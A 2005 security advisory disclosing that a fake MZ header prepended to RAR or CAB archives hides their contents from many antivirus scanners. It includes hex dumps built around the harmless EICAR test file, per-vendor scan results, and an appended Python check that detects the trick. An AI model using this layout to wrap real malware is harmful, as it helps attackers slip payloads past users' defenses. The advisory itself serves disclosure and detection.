-=====================================================================-
Release Date : 2005-10-05
Tested on    : Windows 2000 SP2 & SP4
Tested with  : Jotti Online Antivirus Scanner
Tested with  : VirusTotal Online Antivirus Scanner
Tested with  : Command line freeware UnRAR v3.50
Tested with  : PowerZip v7.06

Affected Products:
  * Kaspersky Antivirus
  * BitDefender Antivirus
  * NOD32 Antivirus
  * F-Prot Antivirus
  * Avast Antivirus
  * McAfee Antivirus
  * Sophos Antivirus
  * Symantec Antivirus
  * Dr.Web Antivirus
  * Avira Antivirus
  * Norman Virus Control Antivirus
  * Fortinet Antivirus
  * VBA32 Antivirus
  * Rising Antivirus
  * AntiVir Antivirus
  * eTrust-Iris Antivirus
  * ArcaVir Antivirus
  * eTrust-Vet Antivirus
  * UNA Antivirus
  * Ikarus AntiVirus
  * ClamAV Antivirus
  * Panda Antivirus
  * CAT Quick Heal
  * TheHacker
  [+] May be others.....

Not affected:
  * Only Grisoft AVG AntiVirus found all PoCs

Discovered by : fRoGGz
Credit to     : SecuBox Labs
Rated as      : Medium
-=====================================================================-

Please, read this first.
________________________

Careful, this is different from CAN-2004-0932 & CAN-2004-0937!
Security Focus bid: 11448

It is also different from the vulnerability reported by Thierry Zoller and discovered by Dr. Peter Bieringer.
Security Focus bid: 12793

[ Why ? ]

[+] Scanning EICAR.zip ... <- (eicar.com is inside)
[-] Writing central header patch [0x00000016]
[-] Writing local header patch [0x0000007F]
[+] File scanning finished. EOF:16 ERR:0

Scanned files
X:\=>Master Boot Record 80                        OK
X:\=>Partition Boot 1 (primary) (active)          OK
X:\=>Master Boot Record 81                        OK
X:\=>Partition Boot 1 (primary)                   OK
X:\SecuBox.Labs\Debug\EICAR.zip                   OK
X:\SecuBox.Labs\Debug\EICAR.zip=>EICAR.com        Infected EICAR-Test-File (not a virus)
X:\SecuBox.Labs\EICAR.zip=>EICAR.com              Deleted
X:\SecuBox.Labs\EICAR.zip                         Update

Ok? So ... it's really different.
-=====================================================================-
Analysis
__________

A specially crafted archive containing a virus passes through the antivirus scanner without detection. An attacker can compress a malicious payload and evade detection by some antivirus software. The bypassed malicious content poses no risk until it is extracted from the RAR archive file; once extracted, it is detected and eliminated by your antivirus.

Unlike WinZip or BitZipper, which refuse to open the file, WinRAR and PowerZip open and extract it.

Possible formats are:
/------------------------------------------------------------\
 *.RAR, *.ZIP, *.CAB, *.ARJ, *.LZH, *.ACE, *.TAR, *.GZ (GZIP)
 *.UUE, *.BZ2, *.JAR, *.ISO, *.7Z, *.Z
\------------------------------------------------------------/

Proof of Concept
________________

************ WARNING *****************
We used eicar.com. The EICAR test file is a 68-byte file that antivirus products "detect" as if it were a virus. Read more about EICAR.
Note:: For BitZipper & WinZip the file is reported as corrupted!
************ WARNING *****************

Compress the file "eicar.com" with WinRAR: eicar.rar
-=====================================================================-
00h: 52 61 72 21 1A 07 00 CF 90 73 00 00 0D 00 00 00 ; Rar!...Ï?s......
10h: 00 00 00 00 D3 AD 74 20 90 2E 00 44 00 00 00 44 ; ....Ó­t ?..D...D
20h: 00 00 00 02 3C CF 51 68 EE A4 45 33 1D 30 09 00 ; ....<ÏQhî€E3.0..
30h: 20 00 00 00 45 49 43 41 52 2E 63 6F 6D 00 F0 A0 ;  ...EICAR.com.ð 
40h: CB 96 58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A ; Ë?X5O!P%@AP[4\PZ
50h: 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 ; X54(P^)7CC)7}$EI
60h: 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 ; CAR-STANDARD-ANT
70h: 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 ; IVIRUS-TEST-FILE
80h: 21 24 48 2B 48 2A C4 3D 7B 00 40 07 00          ; !$H+H*Ä={.@..
-=====================================================================-

The malicious archive must start with a fake MZ header.
Of course, we must test that the result is still a valid archive file.

-=====================================================================-
Archive is correct :: No errors found during test operation
-=====================================================================-
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal

Extracting from SecuBox_AVPoC2.rar

Extracting  EICAR.com                                    OK
All OK

UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal

Testing archive SecuBox_AVPoC2.rar

Testing     EICAR.com                                    OK
All OK
-=====================================================================-

Note:: For PowerZip, only SecuBox_AVPoC2.rar is valid, not PoC n°1.

-=====================================================================-
Proof Of Concept N°1
--------------------

[e_magic][archive]  >> Like this >>  [4D5A][526172211A0700...]

Results for: SecuBox_AVPoC1.rar
_______________________________
[?] AntiVir                 Found nothing
[?] ArcaVir                 Found nothing
[?] Avast                   Found nothing
[!] AVG Antivirus           Found EICAR_Test (+187)
[!] BitDefender             Found EICAR-Test-File (not a virus)
[!] CAT-QuickHeal           Found Eicar.Test
[~] ClamAV                  Found nothing >> Suspect
[?] Dr.Web                  Found nothing
[?] eTrust-Iris             Found nothing
[?] eTrust-Vet              Found nothing
[!] Fortinet                Found EICAR_TEST_FILE
[?] F-Prot Antivirus        Found nothing
[!] Ikarus                  Found EICAR_Test
[?] Kaspersky Anti-Virus    Found nothing
[?] McAfee                  Found nothing
[?] NOD32                   Found nothing
[?] Norman Virus Control    Found nothing
[!] Panda                   Found Eicar.Mod
[?] Sophos                  Found nothing
[?] Symantec                Found nothing
[?] TheHacker               Found nothing
[?] UNA                     Found nothing
[?] VBA32                   Found nothing

PoC n°1
MD5 : e907ab569a6ceed6233e33828032c8f4
SHA1: 071ba79957b80b11b85bb05bdf00f2edb803f4bb

-=====================================================================-
Proof Of Concept N°2
--------------------

[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A )  ( 5000 ) (0200) (00+52 61 72 21 1A 07 00 CF....

Results for: SecuBox_AVPoC2.rar
________________________________
[?] AntiVir                 Found nothing
[!] ArcaVir                 Found Eicar.Test
[!] Avast                   Found EICAR Test-NOT!!
[!] AVG Antivirus           Found EICAR_Test
[?] BitDefender             Found nothing
[!] CAT-QuickHeal           Found Eicar.Test
[~] ClamAV                  Found nothing >> Suspect
[?] Dr.Web                  Found nothing
[?] eTrust-Iris             Found nothing
[?] eTrust-Vet              Found nothing
[?] Fortinet                Found nothing
[?] F-Prot Antivirus        Found nothing
[!] Ikarus                  Found EICAR_Test
[?] Kaspersky Anti-Virus    Found nothing
[?] McAfee                  Found nothing
[?] NOD32                   Found nothing
[?] Norman Virus Control    Found nothing
[!] Panda                   Found Eicar.Mod
[!] Sophos                  Found EICAR-AV-Test
[?] Symantec                Found nothing
[?] TheHacker               Found nothing
[?] UNA                     Found nothing
[?] VBA32                   Found nothing

PoC n°2
MD5 : 757e6c7984028653c557d5b0bf5374fd
SHA1: 438d119bae0eedca413f27958172523738889c75

-=====================================================================-
Proof Of Concept N°3
--------------------

[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A )  ( 5000 ) (0200) (00+4D 53 43 46 00 00 00 00....

Compress the file "eicar.com" with WinRAR: eicar.cab
-=====================================================================-
00h: 4D 53 43 46 00 00 00 00 96 00 00 00 00 00 00 00 ; MSCF....?.......
10h: 2C 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 ; ,...............
20h: 29 00 00 00 46 00 00 00 01 00 01 00 44 00 00 00 ; )...F.......D...
30h: 00 00 00 00 00 00 47 33 F9 86 20 00 45 49 43 41 ; ......G3ù? .EICA
40h: 52 2E 63 6F 6D 00 60 79 2E 6A 48 00 44 00 43 4B ; R.com.`y.jH.D.CK
50h: 8B 30 F5 57 0C 50 75 70 0C 88 36 89 09 88 8A 30 ; ?0õW.Pup.?6?.??0
60h: 35 D1 08 88 D3 34 77 76 D6 34 AF 55 71 F5 74 76 ; 5Ñ.?Ó4wvÖ4¯Uqõtv
70h: 0C D2 0D 0E 71 F4 73 71 0C 72 D1 75 F4 0B F1 0C ; .Ò..qôsq.rÑuô.ñ.
80h: F3 0C 0A 0D D6 0D 71 0D 0E D1 75 F3 F4 71 55 54 ; ó...Ö.q..ÑuóôqUT
90h: F1 D0 F6 D0 02 00                               ; ñÐöÐ..
-=====================================================================-

Results for: SecuBox_AVPoC3.cab
________________________________
[?] AntiVir                 Found nothing
[?] ArcaVir                 Found nothing
[?] Avast                   Found nothing
[!] AVG Antivirus           Found EICAR_Test
[?] BitDefender             Found nothing
[?] CAT-QuickHeal           Found nothing
[?] ClamAV                  Found nothing
[?] Dr.Web                  Found nothing
[?] eTrust-Iris             Found nothing
[?] eTrust-Vet              Found nothing
[?] Fortinet                Found nothing
[?] F-Prot Antivirus        Found nothing
[?] Ikarus                  Found nothing
[?] Kaspersky Anti-Virus    Found nothing
[?] McAfee                  Found nothing
[?] NOD32                   Found nothing
[?] Norman Virus Control    Found nothing
[?] Panda                   Found nothing
[?] Sophos                  Found nothing
[?] Symantec                Found nothing
[?] TheHacker               Found nothing
[?] UNA                     Found nothing
[!] VBA32                   Found EICAR-Test-File

PoC n°3
MD5 : 621990887beb0cbca7a071d3006a7fdf
SHA1: 3edd5b71eaa803d6cdffc181ceaaf9ad9b85cf31

WARNING: results are not 100% verifiable; PoC files were checked via VirusTotal and the Jotti Online Antivirus Scanner.

-=====================================================================-
[ unix analysis ]

thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab
SecuBox_AVPoC3.cab: OK
thot:~$ cabextract SecuBox_AVPoC3.cab
Extracting cabinet: SecuBox_AVPoC3.cab
  extracting EICAR.com

All done, no errors.
thot:~$ clamscan --no-summary EICAR.com
EICAR.com: Eicar-Test-Signature FOUND
thot:~$
thot:~$ clamscan -V
ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005

CREDiTS
---------------------
SecuBox Labs - fRoGGz
Greets fly out to: Jordi Bosveld & VirusTotal
-=====================================================================-
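Detection note (an added example, not code from the SecuBox Labs advisory): a scanner that trusts the leading MZ magic treats these PoC files as executables and never looks for the archive behind the stub, which is what the clamscan/cabextract session above shows. The check below flags a file that starts with MZ, whose e_lfanew (offset 0x3C) does not point at a PE signature, and which carries a known archive magic within its first bytes; it covers both the PoC n°1 layout ([4D5A][archive]) and the PoC n°2/3 layout ([4D5A][5000][0200][00][archive]). The ARCHIVE_MAGICS table, the 64-byte window and the sample header fragments are this example's own assumptions, built from the layouts shown above rather than taken from the PoC files.

```python
import struct

# Signatures for some formats in the advisory's list (assumed subset; the
# advisory lists only extensions, not magic bytes).
ARCHIVE_MAGICS = {
    b"Rar!\x1a\x07\x00": "RAR",
    b"MSCF": "CAB",
    b"PK\x03\x04": "ZIP",
    b"7z\xbc\xaf\x27\x1c": "7Z",
    b"BZh": "BZIP2",
    b"\x1f\x8b": "GZIP",
}
SEARCH_WINDOW = 64  # assumed: how far past "MZ" we look for archive magic

def has_valid_pe_header(data: bytes) -> bool:
    """A genuine PE has e_lfanew (offset 0x3C) pointing at 'PE\\0\\0'."""
    if len(data) < 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def find_hidden_archive(data: bytes):
    """Return (format, offset) when an archive signature follows a fake MZ
    header inside the search window; None for non-MZ data or a real PE."""
    if not data.startswith(b"MZ") or has_valid_pe_header(data):
        return None
    window = data[:SEARCH_WINDOW]
    best = None
    for magic, name in ARCHIVE_MAGICS.items():
        pos = window.find(magic, 2)          # skip the MZ magic itself
        if pos != -1 and (best is None or pos < best[1]):
            best = (name, pos)               # keep the earliest hit
    return best

# Constructed header fragments mirroring the PoC layouts (no payload):
# PoC n.1: [4D5A][archive]; PoC n.2/3: [4D5A][5000][0200][00][archive].
POC1_STYLE = b"MZ" + b"Rar!\x1a\x07\x00" + b"\x00" * 57
POC2_STYLE = b"MZ\x50\x00\x02\x00\x00" + b"Rar!\x1a\x07\x00" + b"\x00" * 50
POC3_STYLE = b"MZ\x50\x00\x02\x00\x00" + b"MSCF" + b"\x00" * 53
# Minimal real-PE-shaped stub: e_lfanew = 0x40 points at the PE signature.
REAL_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00"

if __name__ == "__main__":
    for label, blob in [("PoC1", POC1_STYLE), ("PoC2", POC2_STYLE),
                        ("PoC3", POC3_STYLE), ("real PE", REAL_PE)]:
        print(label, find_hidden_archive(blob))
```

A real PE with an overlay that happens to contain archive bytes is left alone because its e_lfanew resolves, so the check singles out exactly the stub-without-PE shape the PoCs rely on.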